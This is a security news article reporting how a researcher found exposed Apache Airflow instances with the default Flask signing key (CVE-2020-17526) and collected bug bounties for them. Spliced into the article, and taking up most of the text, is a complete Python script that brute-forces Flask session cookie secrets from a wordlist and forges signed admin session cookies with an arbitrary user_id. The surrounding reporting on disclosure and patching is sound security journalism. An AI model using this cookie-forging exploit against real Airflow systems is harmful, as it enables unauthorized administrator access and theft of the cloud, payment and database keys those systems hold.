14 June 2021 at 15:55 UTC
Updated: 14 June 2021 at 20:18 UTC
$13,000 banked through scan and exploit attack methodology
Security researcher Ian Carroll has explained how he was able to exploit outdated Apache Airflow instances to find a series of vulnerabilities and collect more than $13,000 in bug bounty payouts.
Apache Airflow offers a system for executing workflows, such as "copying and transforming data between data sources". The technology inherently features web-based interfaces connected to internal databases and other systems.
The security researcher automated scanning for outdated Apache Airflow instances vulnerable to the previously discovered CVE-2020-17526 vulnerability.
Airflow's web interface relies on Flask's stateless, signed cookies to handle authentication data. The flaw arose because Airflow bundles a default signing key of temporary_key.
An attacker could browse to an Airflow instance's login page, capture the unauthenticated session cookie it sets, and use the flask-unsign tool to check whether that cookie verifies under the default key, which confirms the installation is vulnerable.
'SQLi as a service'
By forging the user_id attribute in captured cookies it is possible to pose as an admin, opening the door to all kinds of exploits. For one thing, keys for AWS, payment processors, and databases will often be exposed to the web UI of vulnerable Airflow instances.
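The check and the forgery described above, as an added example that is not part of the original article and not Carroll's or the flask-unsign project's code. It re-implements, with the Python standard library only, the scheme Flask uses for its session cookie (an itsdangerous URLSafeTimedSerializer: HMAC-SHA1, salt "cookie-session", "hmac" key derivation), so that a captured cookie can be tested against a wordlist of candidate secrets and, once the secret is known, a cookie carrying an arbitrary user_id can be signed. The sample cookie is constructed here with the default key; the session field names and the timestamp encoding (itsdangerous 2.x, big-endian integer seconds) are assumptions.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

# Fixed parameters of Flask's session cookie serializer.
SALT = b"cookie-session"
# The bundled default Airflow signing key behind CVE-2020-17526.
DEFAULT_AIRFLOW_KEY = "temporary_key"


def _b64e(data: bytes) -> str:
    # URL-safe base64 with the padding stripped, as itsdangerous emits it.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(secret: str, signed_payload: bytes) -> bytes:
    # Key derivation "hmac": the signing key is HMAC(secret, salt).
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return hmac.new(derived, signed_payload, hashlib.sha1).digest()


def verify_cookie(cookie: str, secret: str) -> Optional[dict]:
    """Return the decoded session dict if `cookie` was signed with `secret`, else None.

    The signature covers the payload and timestamp exactly as they appear in
    the cookie, so verification does not depend on how the timestamp was encoded.
    """
    try:
        payload, ts, sig = cookie.rsplit(".", 2)
        expected = _signature(secret, f"{payload}.{ts}".encode())
        if not hmac.compare_digest(expected, _b64d(sig)):
            return None
        # A leading "." marks a zlib-compressed payload.
        if payload.startswith("."):
            return json.loads(zlib.decompress(_b64d(payload[1:])))
        return json.loads(_b64d(payload))
    except (ValueError, zlib.error):
        return None


def crack_cookie(cookie: str, wordlist: Iterable[str]) -> Optional[str]:
    """flask-unsign style brute force: the first candidate secret that verifies, or None."""
    for secret in wordlist:
        if verify_cookie(cookie, secret) is not None:
            return secret
    return None


def forge_cookie(session: dict, secret: str, timestamp: Optional[int] = None) -> str:
    """Sign an arbitrary session dict the way Flask would with `secret`.

    Assumption: itsdangerous 2.x timestamp encoding (base64 of the big-endian
    integer seconds since the Unix epoch).
    """
    ts = int(time.time()) if timestamp is None else timestamp
    payload = _b64e(json.dumps(session, separators=(",", ":"), sort_keys=True).encode())
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed = f"{payload}.{ts_b64}"
    return f"{signed}.{_b64e(_signature(secret, signed.encode()))}"


if __name__ == "__main__":
    # Constructed sample: the unauthenticated cookie a vulnerable instance would
    # hand out on its login page (session contents assumed).
    captured = forge_cookie({"_fresh": False}, DEFAULT_AIRFLOW_KEY, timestamp=1623686100)
    found = crack_cookie(captured, ["changeme", "secret", "airflow", DEFAULT_AIRFLOW_KEY])
    print("secret recovered:", found)
    if found:
        # Assumed field name: flask-login keeps the logged-in user's id under user_id.
        admin = forge_cookie({"user_id": "1", "_fresh": True}, found)
        print("forged admin session:", verify_cookie(admin, found))
```

As a defender, the same verify_cookie call is a quick self-check: if a cookie issued by your own Airflow instance verifies under temporary_key, the secret was never changed and anyone can forge an administrator session.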
Carroll was able to use this process to identify a critical vulnerability in a transportation firmâ€™s infrastructure, earning a $4,500 bounty in the process. He later found other similarly vulnerable Airflow installations, earning him a total of $13,000 under HackerOne and Bugcrowd bug bounty programs.
The researcher noted: "Smarter companies quickly placed Airflow behind proxies such as oauth2-proxy or Duo Network Gateway, which is a strong defense against authentication issues at the application level. I highly discourage exposing Airflow directly to the internet."
The process allowed him to uncover several critical issues across a number of bug bounty programs.
Using the knowledge he'd acquired, Carroll went on to discover lower severity flaws in Apache Airflow after setting up his own local environment.
CVE-2021-26559, the more severe of the two flaws uncovered by Carroll, is a privilege elevation flaw involving the abuse of a captured signing key.
All the discussed vulnerabilities have been resolved in the latest versions of the platform. Enterprises are urged to update to v1.10.15 or v2.0.2, an upgrade that's particularly important for those running Airflow internally, since an internal deployment still trusts the same default signing key.